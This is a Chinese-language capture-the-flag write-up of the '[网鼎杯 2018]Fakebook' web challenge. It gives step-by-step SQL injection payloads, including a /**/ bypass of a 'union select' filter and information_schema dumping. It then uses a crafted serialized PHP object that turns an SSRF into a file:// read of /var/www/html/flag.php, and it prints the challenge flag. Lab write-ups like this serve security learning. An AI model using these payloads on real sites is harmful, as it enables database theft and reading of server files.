首页 > 其他分享 >[网鼎杯 2018]Fakebook 1

[网鼎杯 2018]Fakebook 1

时间:2024-11-16 11:56:56浏览次数:1  
标签:php no union flag 2018 网鼎杯 Fakebook select schema

[网鼎杯 2018]Fakebook 1

打开实例发现为博客列表,有登录跳转和类似注册或者添加博客的join跳转

image-20241115223120952

查看源码无果

打开登陆页,尝试万能密码

image-20241115225259566

没有用,尝试从join入手,用admin去随便join一个

image-20241115225618140

显示博客不存在

期间尝试多种sql注入方法均没有效果,转去其他方向

尝试dirsearch目录爆破,发现了几个有用的小玩意儿

image-20241115230935861

image-20241115231211847

image-20241115232909907

注意到robots.txtflag.php等目录

访问robots.txt发现/user.php.bak备份文件路径

image-20241116102619000

打开bak文件,发现php代码

image-20241116102703087

注意到get方法里面存在curl_exec(),可能这道题为ssrf漏洞利用

image-20241116103403034

同时注意到isValidBlog()方法的正则匹配,判断出传入的blog参数值必须为url形式

image-20241116103659536

验证,join页面添加成功

image-20241116103801045

列表出现刚刚添加的输出,点击蓝字进去,发现no参数

image-20241116103915095

image-20241116103927688

回显起刚刚扫到的db.php路径,尝试sql注入

由于注意到bak文件中,age被强转为int,所以这边采用数字型注入方法

image-20241116104558443

and拼接

image-20241116104701993

报错,但是显示出了view.php的路径,由此可以判断flag.php的路径为

 /var/www/html/flag.php

?no=1 and 1=1回显正常,判断存在sql注入

image-20241116104803840

order by判断字段数

?no=1 order by 5

image-20241116104858358

可以看到,当order by 5时候报错,所以字段数为4

union联合查询

?no=1 union select 1,2,3,database()

image-20241116105004034

显示no hack_,判断存在字段过滤

image-20241116105212763

image-20241116105224812

image-20241116105244741

可以看到,union和select均没有被过滤,但是两个加在一起就被过滤,由此可以判断union select被过滤,这边采用/**/注释绕过

?no=-1 union/**/select 1,2,3,4

image-20241116105714816

成功绕过,看到username回显正常,判断username为回显位置,为2

查询当前数据库

?no=-1 union/**/select 1,database(),3,4

image-20241116105848114

库名为fakebook

爆库

?no=-1 union/**/select 1,group_concat(schema_name),3,4 from information_schema.schemata

image-20241116110244709

数据库

fakebook,information_schema,mysql,performance_schema,test

看来fakebook就是我们要的库,爆表

?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="fakebook"

image-20241116110357432

获得users

爆字段

?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="users"

image-20241116110514430

获得字段

no,username,passwd,data

查数据

?no=-1 union/**/select 1,concat(no,"\n",username,"\n",passwd,"\n",data),3,4 from users

image-20241116111009098

注意到data字段里面的数据为刚刚我们join的数据的序列化形式

image-20241116111123118

好玩的来了,注意到源代码这边使用的是iframe

image-20241116111211178

前面分析可知flag.php的路径,ssrf访问文件可以用伪协议file://,把序列化字符串作为参数输入

测试,将blog值改为百度的网址

no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:18;s:4:"blog";s:22:"https://www.baidu.com/";}'

image-20241116112455099

检查元素,发现百度在iframe内用base64的形式被加载了出来

image-20241116112545917

验证成功:

这边由于原本的https://www.baodu.com/是22,所以构造payload时这边改成file:///var/www/html/flag.php要更改长度为29

image-20241116113925419

构造payload

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:18;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

显示正常

image-20241116114018580

查看源代码,发现base64编码字符串

image-20241116114043495

解码获得flag

image-20241116114116599

flag{8d399df2-335e-4fb8-9c18-f5be2ecfea00}

标签:php,no,union,flag,2018,网鼎杯,Fakebook,select,schema
From: https://www.cnblogs.com/tazmi/p/18549230

相关文章

  • PKUSC2018 最大前缀和
    题意给一个长度为\(n\)的整数序列,求其\(n!\)种排列方式的最大前缀和(不能为空)的总和。\(n\leq20\)解法设全集为\(U\),考虑枚举作为最大前缀和的子集\(S\)。那么要求的就是\(S\)排列后严格最大前缀和在最后一个元素取到和方案数和\(U\backslashS\)排列后每个前缀......
  • [AHOI2018初中组] 分组
    题目Description小可可的学校信息组总共有 nn 个队员,每个人都有一个实力值 aiai​。现在,一年一度的编程大赛就要到了,小可可的学校获得了若干个参赛名额,教练决定把学校信息组的 nn 个队员分成若干个小组去参加这场比赛。但是每个队员都不会愿意与实力跟自己过于悬殊的......
  • 洛谷P11183 [ROIR 2018 Day2] 大数据处理
    涉及知识点:动态开点线段树,贪心前言很妙很感性直观的贪心,做完神清气爽。题意Link有一个长为\(2^k\)的序列,编号从\(0\)开始,你要在上面染色,每次只能染色\([k2^i,(k+1)2^i-1]\)的区间(\(0\leqi<k\)),问最少要染色多少次才能变成给定的目标序列。目标序列以形如\((x_1,y_1),(......
  • [Ynoi2018] 未来日记
    [Ynoi2018]未来日记老早之前就想写了,人生中第一道大分块,调了一上午+下午一个小时,对拍了不知道多少万组,终于过了。\[\Huge{本题不卡常本题不卡常本题不卡常本题不卡常本题不卡常本题不卡常本题不卡常}\]\[\Huge{快来写快来写快来写快来写快来写快来写快来写快来写快来写快来写......
  • [网鼎杯 2020 青龙组]AreUSerialz 1
    [网鼎杯2020青龙组]AreUSerialz1打开实例,发现这题为代码审计,查看代码后,确认为GET传递str参数反序列化绕过查看is_valid()方法,发现str参数传递的任意字符的ASCII码需要在32--125之间直接构造payload<?phpclassFileHandler{public$op=2;public$filename=......
  • 攻防世界36-fakebook-CTFWeb
    攻防世界36-fakebook-CTFWeb没发现什么,随便join发现blog有过滤,dirsearch扫描一下,发现robots.txt,和flag.php(不能直接看),发现源码泄露,下载得源码:<?phpclassUserInfo{public$name="";public$age=0;public$blog="";publicfunction__const......
  • 2018年某天感想
    行走在校园里,来往的行人很少,一路的桂花香扑鼻而来,偶尔看看小孩嬉戏打闹,看看天空和远方,回忆年轻时的时光。。。。我想这应该比较向往的中老年生活,慢悠悠地散步,慢悠悠地享受生活,什么烦恼啊、疲惫啊也都烟消云散了。一年的我也是这么悠闲:每天吃吃睡睡,导员有任务安排就立马去做,同学有......
  • 【软考】系统架构设计师-2018年下半年下午案例真题及答案
    全国计算机技术与软件专业技术资格(水平)考试高级系统架构设计师2018年下半年下午试卷 案例试题一 【说明】某文化产业集团委托软件公司开发一套文化用品商城系统,业务涉及文化用品销售、定制、竞拍和点评等板块,以提升商城的信息化建设水平。该软件公司组织项......
  • 【软考】系统架构设计师-2018年下半年下午论文真题及答案
    全国计算机技术与软件专业技术资格(水平)考试高级系统架构设计师2018年下半年下午试卷 论文试题一 论软件开发过程 RUP 及其应用RUP(RationalUnifiedProcess)是 IBM 公司一款软件开发过程产品,它提出了一整套以UML 为基础的开发准则,用以指导软件开发人员以 U......
  • 题解:P11262 [COTS 2018] 题日 Zapatak
    https://www.luogu.com.cn/article/i7ajvm8e哈希好题。题意给定一个序列,每次询问给定两个长度相等的区间,问这两个区间是否只有一个数不一样。思路发现我们要求的信息只与数的出现次数有关,自然想到桶。那么如果有两个区间合法,那这两个区间的桶只有两个位置不同且桶内的值均相......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99